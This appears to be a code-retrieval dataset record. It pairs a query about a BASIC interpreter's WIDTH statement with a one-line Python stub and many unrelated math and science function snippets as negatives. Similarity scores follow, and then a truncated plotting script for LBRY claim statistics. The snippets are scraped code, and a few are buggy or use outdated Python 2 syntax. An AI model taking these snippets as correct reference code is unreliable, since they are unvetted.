wrap(dnde_photon_pi_pi_omega),\n \"pi0 pi0 omega\": wrap(dnde_photon_pi0_pi0_omega),\n \"pi0 k0 k0\": wrap(dnde_photon_pi0_k0_k0),\n \"pi0 k k\": wrap(dnde_photon_pi0_k_k),\n \"pi k k0\": wrap(dnde_photon_pi_k_k0),\n \"pi pi pi pi\": wrap(dnde_photon_pi_pi_pi_pi),\n \"pi pi pi0 pi0\": wrap(dnde_photon_pi_pi_pi0_pi0),\n \"v v\": wrap(dnde_photon_v_v),\n }", "def FN2(lam):\n return 1.034 + 3.17 *1e-4 *lam**(-2)", "def ddalf(x):\n return dalf_spl.derivatives(x)[1]", "def calcSfb(Idc,I3, R, Tj,g1,g2,g3):\n t = np.linspace(0, 1, 1000, endpoint=False)\n It = Idc[:, None]+I3*np.cos(2*np.pi*t[None, :])\n St = qnoise_fit.Sii(It, R, Tj)\n Dt = qnoise_fit.dSiidV(It, R, Tj)\n S0 = qnoise_fit.Fcoef(St, t, 0)\n D3 = qnoise_fit.Fcoef(Dt, t, 1)[0]\n S3 = qnoise_fit.Fcoef(St, t, 1)[0]\n D0 = qnoise_fit.Fcoef(Dt, t, 0)\n D6 = qnoise_fit.Fcoef(Dt, t, 2)[0]\n return g1*S0*D3+g2*S3*D0+g3*D6*S3", "def _partial_derivative_f1(self, f1, f2, m_star, n):\r\n if f1 > 0 and f2 > 0:\r\n a_0 = self._calculate_a_0(f1, f2, n)\r\n term1 = (m_star * a_0 ** (m_star - 1)) / n\r\n term2 = (f1 * (1 - a_0 ** m_star)) / f2\r\n return 1 - term1 + term2\r\n else:\r\n a_1 = self._calculate_a_1(f1, f2, n)\r\n term1 = (m_star * f1) * a_1 ** (m_star - 1)\r\n term2 = n * (f1 - 1)\r\n term3 = (f1 - 1) * (1 - a_1 ** m_star)\r\n term4 = 2 * (f2 + 1)\r\n term5 = f1 * (1 - a_1 ** m_star)\r\n return 1 - (term1 / term2) + (term3 / term4) + (term5 / term4)", "def richards_equation(x, s, gradient, kfun):\n return -kfun(x, s) * (gradient + 1)", "def F_std_coeff(d):\n return (d ** 2 - 1) / 4", "def constant_equation(funct):\n return funct + \"x\"", "def F(cst, x):\n [u0, v0, u1, v1, u2, v2, coeffs] = cst\n [u, v, g1, g2, g3] = x\n a = g1*u1 - u0\n b = g2*u2 - u0\n c = g3*u - u0\n l = g1*v1 - v0 \n m = g2*v2 - v0\n n = g3*v - v0\n r = g1 - 1\n s = g2 - 1\n t = g3 - 1\n return np.array([\n coeffs[0]*(a**2-l**2) + 2*coeffs[1]*(a*b-l*m) + coeffs[2]*(b**2-m**2) + 2*coeffs[3]*(a*c-l*n) + 2*coeffs[4]*(b*c-m*n) + c**2 - n**2,\n coeffs[0]*(l**2-r**2) + 2*coeffs[1]*(l*m-r*s) + coeffs[2]*(m**2-s**2) + 2*coeffs[3]*(l*n-r*t) + 2*coeffs[4]*(m*n-s*t) + n**2 - t**2,\n coeffs[0]*a*l + coeffs[1]*(l*b+m*a) + coeffs[2]*m*b + coeffs[3]*(l*c+n*a) + coeffs[4]*(m*c+b*n) + c*n,\n coeffs[0]*a*r + coeffs[1]*(r*b+s*a) + coeffs[2]*s*b + coeffs[3]*(r*c+t*a) + coeffs[4]*(s*c+b*t) + c*t,\n coeffs[0]*r*l + coeffs[1]*(l*s+m*r) + coeffs[2]*m*s + coeffs[3]*(l*t+n*r) + coeffs[4]*(m*t+s*n) + t*n \n ])", "def FD(f, s, p, d=1, z=1, m=1, dx=1e-6, gmix=False, k=['All']):\n if k == ['All']:\n ph = 't'\n cph = 'x'\n else:\n ph = k[0]\n cph = k[0]\n \n if d == 1:\n s.c[z][cph] += 0.5*dx\n X_d = []\n for i in range(1, p.m['n']):\n X_d.append(s.c[i][cph])\n \n s = s.update_state(s, p, X = X_d, Force_Update=True) \n if gmix:\n f1 = f(s, p).m['g_mix'][ph]\n else:\n f1 = f(s, p)\n \n s.c[z][cph] -= 1.0*dx\n X_d = []\n for i in range(1, p.m['n']):\n X_d.append(s.c[i][cph])\n \n s = s.update_state(s, p, X = X_d, Force_Update=True) \n if gmix:\n f2 = f(s, p).m['g_mix'][ph]\n else:\n f2 = f(s, p)\n \n return (f1 - f2)/dx\n \n if d == 2:\n s.c[z][cph] += 1.0*dx\n s.c[m][cph] += 1.0*dx\n X_d = []\n for i in range(1, p.m['n']):\n X_d.append(s.c[i][cph])\n \n s = s.update_state(s, p, X = X_d, Force_Update=True) \n if gmix:\n f1 = f(s, p).m['g_mix'][ph]\n else:\n f1 = f(s, p)\n \n s.c[m][cph] -= 2.0*dx\n X_d = []\n for i in range(1, p.m['n']):\n X_d.append(s.c[i][cph])\n \n s = s.update_state(s, p, X = X_d, Force_Update=True) \n if gmix:\n f2 = f(s, p).m['g_mix'][ph]\n else:\n f2 = f(s, p)\n \n 
s.c[z][cph] -= 2.0*dx\n s.c[m][cph] += 2.0*dx\n X_d = []\n for i in range(1, p.m['n']):\n X_d.append(s.c[i][cph])\n \n s = s.update_state(s, p, X = X_d, Force_Update=True) \n if gmix:\n f3 = f(s, p).m['g_mix'][ph]\n else:\n f3 = f(s, p)\n \n s.c[m][cph] -= 2.0*dx\n X_d = []\n for i in range(1, p.m['n']):\n X_d.append(s.c[i][cph])\n \n s = s.update_state(s, p, X = X_d, Force_Update=True) \n if gmix:\n f4 = f(s, p).m['g_mix'][ph]\n else:\n f4 = f(s, p)\n \n return (f1 - f2 - f3 + f4)/(4.0*dx*dx)", "def fdq2(f, x, h=1e-5):\n return (-3*f(x) + 4*f(x+h) - f(x+2*h))/(2*h)\n raise NotImplementedError(\"Problem 2 Incomplete\")", "def steffensen ( fun , x , fx = None , args = () ) :\n \n if fx is None : fx = float ( fun ( x , *args ) ) ## reuse if already calculated\n if fx : \n gx = ( fun ( x + fx , *args ) - fx ) / fx\n if gx : return x - fx / gx", "def F(x):\n soln = x - (1.0/5.0)*math.cos(10.0*x+1.0) \n return soln", "def derivert(f, k):\r\n \r\n return(k*f)", "def compute_fk(self, sigma, sigma_des, C, offset):\n if sigma >= sigma_des:\n # push robot away\n f = -((sigma - sigma_des) ** 2)/C + offset\n elif sigma < sigma_des:\n # pull robot in\n f = ((sigma - sigma_des) ** 2)/C + offset\n else:\n f = 0\n return f", "def fkine_ur5(q):\n \n \n T1 = dh(0.08916, +q[0], 0.0, +pi/2)\n T2 = dh( 0.0, +q[1], -0.425, 0.0)\n T3 = dh( 0.0, +q[2], -0.392, 0.0)\n T4 = dh(0.10915, +q[3], 0.0, +pi/2)\n T5 = dh(0.09465, +pi+q[4], 0.0, +pi/2)\n T6 = dh( 0.0823, +pi+q[5], 0.0, 0.0)\n \n # Efector final con respecto a la base\n T = np.dot(np.dot(np.dot(np.dot(np.dot(T1,T2),T3),T4),T5),T6)\n return T", "def _f(X, g, n):\n if n == 3:\n n = 3.001 # for numerical stability\n hyp2f1_term = hyp2f1((n-1)/2, g/2, n/2, 1/(1+X**2))\n beta_term = beta((n-1)/2, 0.5)\n return 0.5 * beta_term * hyp2f1_term * (1+X**2) ** ((1-n)/2)", "def f3(x):\n return 1 / (1 + x**2)", "def dfda(x: np.array) -> np.array:\n return x**2", "def sq_custom(f,T,a=0,b=0):\n fs=44100\n t=np.linspace(0,T,T*fs)\n A=np.floor(a*fs*T)\n D=np.floor(b*fs*T)\n S1=np.linspace(0,1,A)\n S2=np.ones(T*fs-A-D)\n S3=np.linspace(1,0,D)\n S0=signal.square(2 * np.pi * f * t)\n return(np.hstack((S1,S2,S3))*S0)", "def radio_lumfn(L, _params):\n print _params\n # Number density as a function of sfr, dn/dlog(sfr)\n sfr = L * 5.52e-29 # erg/s/Hz, Bell (2003), Eq. 6\n dndlogsfr_sfms, dndlogsfr_pass = g.sfr_fn(hm, sfr, z=0., params=_params)\n #phi = dndlogsfr_sfms #+ dndlogsfr_pass\n return dndlogsfr_sfms, dndlogsfr_pass", "def newton1d(f, df, ddf, x, niter=10):\n\n x_0 = x\n x_k = x\n\n for i in xrange(niter):\n x_k1 = x_k - df(x_k)/ddf(x_k)\n x_k = x_k1\n\n return x_k", "def basis_fns(n=0):\n return lambda x: np.sum(x ** (n+1), axis=1)", "def diff_fn(\n mu_i: tf.Tensor,\n ddu_n_i: tf.Tensor,\n ddu_t_i: tf.Tensor,\n ) -> tf.Tensor:\n return mu_i * (4.0 / 3.0 * ddu_n_i + 1.0 / 3.0 * ddu_t_i)", "def HFCALC(N, R, Zeta1, Zeta2, Za, Zb, G):\n # Calculate one and two electron integrals\n Intgrl(N, R, Zeta1, Zeta2, Za, Zb)\n # Put all integals into array\n Colect(N, R, Zeta1, Zeta2, Za, Zb)\n # Perform the SCF calculation\n SCF(N, R, Zeta1, Zeta2, Za, Zb, G)\n return", "def chain_2(d2f_dg2, dg_dx, df_dg, d2g_dx2):\r\n return d2f_dg2*(dg_dx**2) + df_dg*d2g_dx2", "def build_quadratic_function(a,b,c):\n return lambda x: a*x**2 + b*x + c", "def ST99(self,dc,nu):\n if len(self.bias_par.keys()) == 0:\n q = 0.707\n p = 0.3\n else:\n q = self.bias_par['q']\n p = self.bias_par['p']\n return 1. 
+ (q*nu**2-1.)/dc + (2.*p/dc)/(1.+(q*nu**2)**p)", "def func(f,c):\n return(f**2+c)", "def get_fnllh(self):\n\n def fnllh(p):\n return 0.5 * anp.sum(self.get_fres()(p) ** 2)\n\n return fnllh", "def f(x):\n return N.sqrt(N.power(N.cos(x),2)+1.0)", "def f(x):\n\treturn np.sin(x / 5.0) * np.exp(x / 10.0) + 5 * np.exp(-x / 2.0)", "def DDG(self, n, e, r, f):\n pre = (-e[:, None] + np.divide.outer((n - 1), r))**2\n pre -= np.divide.outer((n - 1), r**2)\n return pre*f", "def fermi(q_values, nu=None, kt=None):\n if kt is None:\n kt = np.mean(q_values)\n if nu is None:\n nu = np.std(q_values)\n return 1.0/(1 + np.exp((q_values - nu) / kt))", "def intern_F(self):\n if self.A is None:\n def Fx(x,y):\n if self.hx is None:\n fx = self.gradf(x)\n self.Fz = fx, None, None\n return fx, None, None\n else:\n vec_prod = np.zeros(len(x))\n fy = np.zeros(len(y))\n for i in range(len(y)):\n gh = self.gradh[i+1](x,i+1)\n vec_prod += y[i] * gh\n if self.optimized:\n fy[i] = -self.hx[i+1](x, i+1, gh)\n else:\n fy[i] = -self.hx[i+1](x, i+1)\n fx = self.gradf(x)+ vec_prod\n self.Fz = fx, fy, None\n return fx, fy, None\n else:\n def Fx(x,y,u):\n if self.hx is None:\n fx = self.gradf(x)\n fu = self.b-self.A@x\n self.Fz = fx, None, fu\n return fx, None, fu\n else:\n vec_prod = np.zeros(len(x))\n fy = np.zeros(len(y))\n for i in range(len(y)):\n gh = self.gradh[i+1](x,i+1)\n vec_prod += y[i] * gh\n if self.optimized:\n fy[i] = -self.hx[i+1](x, i+1, gh)\n else:\n fy[i] = -self.hx[i+1](x, i+1)\n fx = self.gradf(x)+ vec_prod\n fu = self.b-self.A@x\n self.Fz = fx, fy, fu\n return fx, fy, fu\n return Fx", "def fnu(self, m):\n return 10**(-0.4*(m -23.9))", "def f5(x):\n return 2* sin(x) + sin(2*x)", "def gradfactor(self, f):\r\n raise NotImplementedError", "def f(X_,K_):\r\n return max(exp(X_)-K_,0)", "def DisLayerSN_d(ndf, k):\n d_in = 2**k \n d_out = 2**(k+1)\n\n out = nn.Sequential(nn.utils.spectral_norm(\n nn.Conv2d(ndf*d_in, ndf*d_out, kernel_size, stride=stride, padding=padding, bias=False)), \n nn.Dropout2d(),\n nn.BatchNorm2d(ndf * d_out), \n nn.LeakyReLU(0.2, inplace=True) )\n return out", "def df2dx3_func(self,X):\n result = (\n self.rj*self.rm*self.k_spr*self.b_spr * (\n np.exp(self.b_spr*(self.rm*X[2] - self.rj*X[0]))\n * ((self.rm*X[2] - self.rj*X[0])>=0)\n ) / self.Ij\n )\n return(result)", "def f(x):\n\treturn (sc.log(x**2+5)*sc.cos(0.8*x)+3.5*x)/(sc.e**(x/10))", "def F2K(T_F):\n return 5./9.*(T_F+459.67)", "def shape_function(self, idx, x):\n if idx == 0:\n return (1-x)/2\n elif idx == 1:\n return (1+x)/2\n elif idx == 2:\n return (x**2-1)*sqrt(3./2)/2\n elif idx == 3:\n return (x**2-1)*x*sqrt(5./2)/2\n elif idx == 4:\n return (x**2-1)*(5*x**2-1)*sqrt(7./2)/8\n elif idx == 5:\n return (x**2-1)*(7*x**2-3)*sqrt(9./2)/8\n elif idx == 6:\n return (x**2-1)*(21*x**4-14*x**2+1)*sqrt(11./2)/16\n elif idx == 7:\n return (x**2-1)*(33*x**4-30*x**2+5)*sqrt(13./2)/16\n elif idx == 8:\n return (x**2-1)*(429*x**6-495*x**4+135*x**2-5)*sqrt(15./2)/128\n elif idx == 9:\n return (x**2-1)*(715*x**6-1001*x**4+385*x**2-35)*sqrt(17./2)/128\n elif idx == 10:\n return (x**2-1)*(2431*x**8-4004*x**6+2002*x**4-308*x**2+7)*sqrt(19./2)/256\n raise NotImplementedError(\"Such shape function is not implemented yet (i=%d)\" % i)", "def Eqn(x,b0,b1,b2,b3,b4): \n return b0*np.exp(-0.5*b1**2*(x-b2)**2)*np.cos(b3*(x-b4))", "def nth_derivative(f, x, n):\n h = 10e-2\n out_h = 1/(h**n)\n out = 0\n for k in range(0, n+1):\n out += (-1)**(k+n)*choose(n,k)*f(x +k*h)\n return out_h*out", "def evaluate(x,a,b,c,k1,k2,f1,f2):\n return a * np.sin(k1 * x - f1) 
+ b * np.cos(k2 * x - f2) + c", "def f_np(phi, lambd):\n f = 1. / (np.absolute(1. - sft(phi, lambd)) ** 2)\n return f", "def N_gfun(self,y):\n return 0.0", "def digamma(F):\n def compute(value):\n \"\"\"Return digamma(value)\n \"\"\"\n if isinstance(value, Number):\n if sc is not None:\n return sc.digamma(value, dtype='float32')\n else:\n raise ValueError('Numbers are not supported as input if scipy is not installed')\n return F.npx.digamma(value)\n return compute", "def F(self, (k,t), (j,x), **params):\n return 0.*x", "def make_DL_cp_le_quad_func(n, x_0):\n def quad_func(xi, eta, nodes):\n x = geo.linear_interp(xi, eta, nodes)\n return geo.stresslet_n(x, x_0, n)\n return quad_func", "def simpson(func, start, stop):\n return (func(start) + 4*func((start+stop)/2) + func(stop)) * (stop-start)/6", "def get_basisfunc(self, k, j, knots):\n def basisfunction(u, k=k, j=j, knots=knots):\n \"\"\"\n Method to evaluate the the basis function N^k with index j at point u.\n u (float): the point where to evaluate the basis function\n k (int): the degree of the basis function\n j (int): the index of the basis function we want to evaluate\n knots (array): knot sequence u_i, where i=0,...,K\n \"\"\"\n if k == 0:\n return 1 if knots[j] <= u < knots[j+1] \\\n else 0\n else:\n try:\n a0 = 0 if knots[j+k] == knots[j] \\\n else (u - knots[j])/(knots[j+k]-knots[j])\n a1 = 0 if knots[j+k+1] == knots[j+1] \\\n else (knots[j+k+1] - u)/(knots[j+k+1] - knots[j+1])\n basisfunc = a0 * basisfunction(u, k=k-1) \\\n + a1 * basisfunction(u, k=k-1, j=j+1)\n except IndexError:\n numBasisfunc = len(knots) - 1 - k\n return 'Invalid index. There are no more than {} basis functions for the given problem, choose an ' \\\n 'index lower than the number of basis functions.'.format(numBasisfunc)\n return basisfunc\n return basisfunction", "def f(x):\n return math.exp(-x**2)/(1+x**2)+(2*math.cos(x)**2)/(1+(x-4)**2)", "def simpson2(func, start, stop):\n return (func(start) + 3*func((2*start+stop)/3) + 3*func((start+2*stop)/3) + func(stop)) * (stop-start)/8", "def _fv(self):\n return self.beta * (self.x ** self.c)", "def kf(f, amp, tr_fac, del_fac, t):\n T = 1 / f\n delay = del_fac * T\n tr = tr_fac * T\n beta = 1 - (2 * tr / T)\n\n t_T1 = 0\n t_T2 = (T * (1 - beta) / 4)\n t_T3 = (T * (1 + beta) / 4)\n t_T4 = (T * (3 - beta) / 4)\n t_T5 = (T * (3 + beta) / 4)\n t_T6 = T\n\n t = np.mod(t - delay, T)\n if t_T1 <= t < t_T2:\n f_value = amp * np.sin((2 * np.pi * t) / (T * (1 - beta)))\n elif t_T2 <= t < t_T3:\n f_value = amp\n elif t_T3 <= t < t_T4:\n f_value = amp * np.sin(\n (2 * np.pi * (t - (beta * T / 2))) / (T * (1 - beta)))\n elif t_T4 <= t < t_T5:\n f_value = -amp\n elif t_T5 <= t <= t_T6:\n f_value = amp * np.sin((2 * np.pi * (t - beta * T)) / (T * (1 - beta)))\n return f_value\n # ------------------------------------------\n\n\n # sinusoidal (sinusiodal) function that is continuous in acc", "def get_dissim_func(self, num_itrees):\n self.get_n_random_itrees(num_itrees, self.data.shape[0])\n self.get_node_masses()\n return lambda x1, x2, **kwargs : self.mass_based_dissimilarity(x1, x2)" ]
[ "0.6282961", "0.6064702", "0.59194523", "0.5878748", "0.58671814", "0.5861088", "0.5792502", "0.57803655", "0.5707842", "0.5690402", "0.56867594", "0.5677876", "0.566242", "0.5646247", "0.5644403", "0.56438243", "0.56058556", "0.5597457", "0.5594543", "0.5573553", "0.5563041", "0.5547822", "0.5529641", "0.55270964", "0.55134964", "0.5486521", "0.5448207", "0.544423", "0.54434663", "0.54339707", "0.5422863", "0.5419782", "0.5409645", "0.5409112", "0.5403176", "0.54001695", "0.5387783", "0.53841907", "0.5380699", "0.53765404", "0.5371956", "0.536649", "0.53662807", "0.53634244", "0.53614295", "0.5360938", "0.53539026", "0.53511894", "0.53449565", "0.5344544", "0.53297883", "0.5328778", "0.53220373", "0.5321187", "0.53091484", "0.5301694", "0.52979934", "0.52970654", "0.5295533", "0.52910346", "0.5290825", "0.5273874", "0.5257249", "0.5249992", "0.52347", "0.5234545", "0.52270955", "0.5224642", "0.5222532", "0.5222129", "0.52211577", "0.52190506", "0.52168477", "0.5213832", "0.52075", "0.5207249", "0.52058935", "0.52050817", "0.5202541", "0.52010655", "0.5198552", "0.51962006", "0.5186163", "0.5183545", "0.51815337", "0.5180948", "0.51793617", "0.51773363", "0.5162331", "0.5152677", "0.51493263", "0.5148818", "0.5146332", "0.51455814", "0.51448435", "0.5144818", "0.5143885", "0.5143176", "0.51392984", "0.51375556", "0.5136591" ]
0.0
-1
The WIDTH statement is only for compatibility with some versions of BASIC. It sets the width of the screen. Ignored.
def stmt_width(executor, stmt): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def width(self):\n return(self.SCREEN_W)", "def width(self):\n\t\tpass", "def setWidth(*args):", "def setWidth(*args):", "def setWidth(*args):", "def setWidth(*args):", "def setWidth(*args):", "def setWidth(*args):", "def setWidth(*args):", "def setWidth(*args):", "def setWidth(*args):", "def setWidth(*args):", "def setWidth(*args):", "def set_width(self, width):\n self.width = width", "def set_width(self, *args):\n return _ida_hexrays.lvar_t_set_width(self, *args)", "def width(self) -> int:", "def width(self) -> int:", "def SetWidth(self, w):\r\n\r\n self._width = w", "def set_window_width(self, width):\n self.device.set_window_width(int(width))\n return \"OK\"", "def set_width(self, width):\n self.__width = width", "def min_width(self):\n ...", "def setWidth(self, *args):\n return _libsbml.Dimensions_setWidth(self, *args)", "def setWidth(self, width):\n if not self._width:\n self._width = int(width)", "def width(self) -> int:\n return self.screen.getmaxyx()[1]", "def screen_width(self):\n # type: () -> int\n return self._screen_width", "def width (self):\n return self._w", "def setWidth(self, width):\n self._reconfig(\"width\", width)", "def width(self, width):\n\n self._width = width", "def width(self, width):\n\n self._width = width", "def width(self, width):\n\n self._width = width", "def width(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"width\")", "def width(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"width\")", "def width(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"width\")", "def get_width(self):\n return \"%s\" % self.width", "def width(self, width):\n if type(width) is not int:\n raise TypeError(\"width must be an integer\")\n if width <= 0:\n raise ValueError(\"width must be > 0\")\n self.__width = width", "def width(self, width):\n if type(width) is not int:\n raise TypeError(\"width must be an integer\")\n elif width <= 0:\n raise ValueError(\"width must be > 0\")\n else:\n self.__width = width", "def _get_window_width(self):", "def width(self, width):\n if type(width) is not int:\n raise TypeError(\"width must be an integer\")\n if width is 0 or width < 0:\n raise ValueError(\"width must be > 0\")\n self.__width = width", "def winfo_screenwidth(self):\n return self.width", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[int]]:\n return 
pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"width\")", "def width(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"width\")", "def width(self, value):\n self._el._parent.execute_script(\"arguments[0].width = arguments[1]\", self._el, value)\n self.changed = True", "def width(self, value):\n self._el._parent.execute_script(\"arguments[0].width = arguments[1]\", self._el, value)\n self.changed = True", "def getWidth(self) -> int:\n ...", "def port_width(self) -> int:\n pass", "def width(self, value):\n self.integer_validator(\"width\", value)\n self.__width = value", "def screen_width(self, screen_width):\n # type: (int) -> None\n\n if screen_width is not None:\n if not isinstance(screen_width, int):\n raise TypeError(\"Invalid type for `screen_width`, type has to be `int`\")\n\n self._screen_width = screen_width", "def width(self):\n return self['width']", "def opt_width(self, width):\n if width != \"auto\":\n width = int(width)\n self.conf[\"width\"] = width", "def width(self, value):\n self.data_validator(\"width\", value)\n self.__width = value", "def width(cls):\n return cls._width", "def width(self):\n return (self.__width)", "def width(self, w):\n if w < 0:\n w *= -1\n self._width = w", "def width(self, value):\n if type(value) != int:\n raise TypeError(\"width must be an integer\")\n if value <= 0:\n raise ValueError(\"width must be > 0\")\n self.__width = value", "def getUserScreenWidth( player ):\n r = player.db.screenWidth\n if r is None:\n r = getClientScreenWidth(player)\n return r", "def width(self, value):\n self.validate_input(width=value)\n self.__width = value", "def getWidth(self):\n return DEFAULT_WIDTH", "def width(self) -> int:\n return self.__width", "def getWidth(self):\n return constants.DEFAULT_WIDTH", "def widths(self):\n return self._widths", "def max_width(self):\n ...", "def width(self):\n # type: () -> float\n return self._width", "def width(self, width):\n self.col += width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self.__width", "def width(self):\n return self._vim.current.window.width", "def width(self, value):\n if isinstance(value, int) is False:\n raise TypeError(\"width must be an integer\")\n if value <= 0:\n raise ValueError(\"width must be > 0\")\n self.__width = value", "def width(self) -> int:\n return self._width", "def set_pixel_width(self, width):\n # set in um\n self._dll.ShamrockSetPixelWidth(self._device, 
c_float(width))" ]
[ "0.7544066", "0.7302459", "0.72391605", "0.72391605", "0.72391605", "0.72391605", "0.72391605", "0.72391605", "0.72391605", "0.72391605", "0.72391605", "0.72391605", "0.72391605", "0.69712067", "0.69448876", "0.6928398", "0.6928398", "0.6913508", "0.6904323", "0.68787444", "0.68562406", "0.6825356", "0.67942095", "0.67021114", "0.6696766", "0.6687491", "0.6646173", "0.6644446", "0.6644446", "0.6644446", "0.66243577", "0.66243577", "0.66243577", "0.65513694", "0.6522754", "0.65152466", "0.64917463", "0.6484234", "0.64817905", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64760965", "0.64746845", "0.64746845", "0.64746845", "0.64746845", "0.64746845", "0.64746845", "0.64746845", "0.64746845", "0.64746845", "0.64669394", "0.64669394", "0.6435798", "0.64160246", "0.6401357", "0.63710916", "0.63673586", "0.63595456", "0.6333893", "0.6325932", "0.63163483", "0.6315539", "0.6314432", "0.63059276", "0.6305175", "0.629886", "0.6297607", "0.6294452", "0.6287179", "0.6278912", "0.62750876", "0.62626314", "0.62585825", "0.62585825", "0.62585825", "0.62585825", "0.62585825", "0.62585825", "0.62585825", "0.62585825", "0.62585825", "0.62585825", "0.62585825", "0.62585825", "0.62519825", "0.6246505", "0.6241777", "0.6240391" ]
0.0
-1
mode must be "claims" or "channels"
def make_graph(mode, show=True): if mode != "claims" and mode != "channels": return plt.close("all") # Open the DB db_file = "/home/brewer/local/lbry-sdk/lbry/lbryum-data/claims.db" conn = sqlite3.connect(db_file) c = conn.cursor() # List for results times = [] # Query if mode == "claims": x = "<>" else: x = "=" query = "SELECT creation_timestamp FROM claim\ WHERE claim_type {x} 2;".format(x=x) # Iterate over query results i = 0 for t in c.execute(query): times.append(t) i = i + 1 # We can also close the connection if we are done with it. # Just be sure any changes have been committed or they will be lost. conn.close() # Sort the times and convert to a numpy array times = np.sort(np.array(times).flatten()) # Save some stats to JSON for Electron now = time.time() my_dict = {} my_dict["unix_time"] = now my_dict["human_time_utc"] = str(datetime.datetime.utcfromtimestamp(int(now))) + " UTC" my_dict["total_{mode}".format(mode=mode)] = int(\ len(times)) my_dict["new_{mode}_1_hour".format(mode=mode)] = int(\ np.sum(times > (now - 3600.0))) my_dict["new_{mode}_24_hours".format(mode=mode)] = int(\ np.sum(times > (now - 86400.0))) my_dict["new_{mode}_7_days".format(mode=mode)] = int(\ np.sum(times > (now - 7*86400.0))) my_dict["new_{mode}_30_days".format(mode=mode)] = int(\ np.sum(times > (now - 30*86400.0))) f = open("{mode}_stats.json".format(mode=mode), "w") f.write(json.dumps(my_dict)) f.close() # Count new claims this UTC day count_today = np.sum(times > 86400.0*int(now/86400.0)) if mode == "claims": string = "publications" else: string = "channels" print("{K} {mode}, {n} from today so far (UTC). ".format(K=len(times), mode=string, n=count_today), end="", flush=True) # Plotting stuff plt.rcParams["font.family"] = "Liberation Sans" plt.rcParams["font.size"] = 14 plt.style.use("dark_background") plt.rcParams["axes.facecolor"] = "#3c3d3c" plt.rcParams["savefig.facecolor"] = "#3c3d3c" plt.figure(figsize=(15, 11)) plt.subplot(2, 1, 1) times_in_days = (times - 1483228800)/86400.0 days = times_in_days.astype("int64") plt.plot(times_in_days, np.arange(len(times)), "w-", linewidth=1.5) plt.ylabel("Cumulative number of {mode}".format(mode=string)) plt.title("Total number of {mode} = {n}.".format(n=len(times), mode=string)) plt.xlim([0.0, days.max() + 1]) plt.ylim(bottom=-100) plt.gca().tick_params(labelright=True) # Add vertical lines for new years (approximately) new_years = np.arange(0, 5)*365.2425 for year in new_years: plt.axvline(year, color="r", alpha=0.8, linestyle="--") # Add text about years year_names = [2017, 2018, 2019] for i in range(len(year_names)): year = new_years[i] plt.text(year+5.0, 0.95*plt.gca().get_ylim()[1], "{text} begins".format(text=year_names[i]), fontsize=10) # Add line and text about MH's video plt.axvline(890.0, linestyle="dotted", linewidth=2, color="g") plt.text(890.0, 0.2*plt.gca().get_ylim()[1], "@MH video\n\'Why I Left YouTube\'\ngoes viral", fontsize=10) plt.subplot(2, 1, 2) bin_width = 1.0 # Bin edges including right edge of last bin bins = np.arange(0, np.max(days)+2) - 0.5*bin_width color = "#6b95ef" counts = plt.hist(days, bins, alpha=0.9, color=color, label="Raw", width=bin_width, align="mid")[0] # Compute 10-day moving average moving_average = np.zeros(len(bins)-1) for i in range(len(moving_average)): subset = counts[0:(i+1)] if len(subset) >= 10: subset = subset[-10:] moving_average[i] = np.mean(subset) plt.plot(bins[0:-2] + 0.5*bin_width, moving_average[0:-1], "w-", label="10-day moving average", linewidth=1.5) plt.xlim([0.0, days.max() + 1]) plt.xlabel("Time 
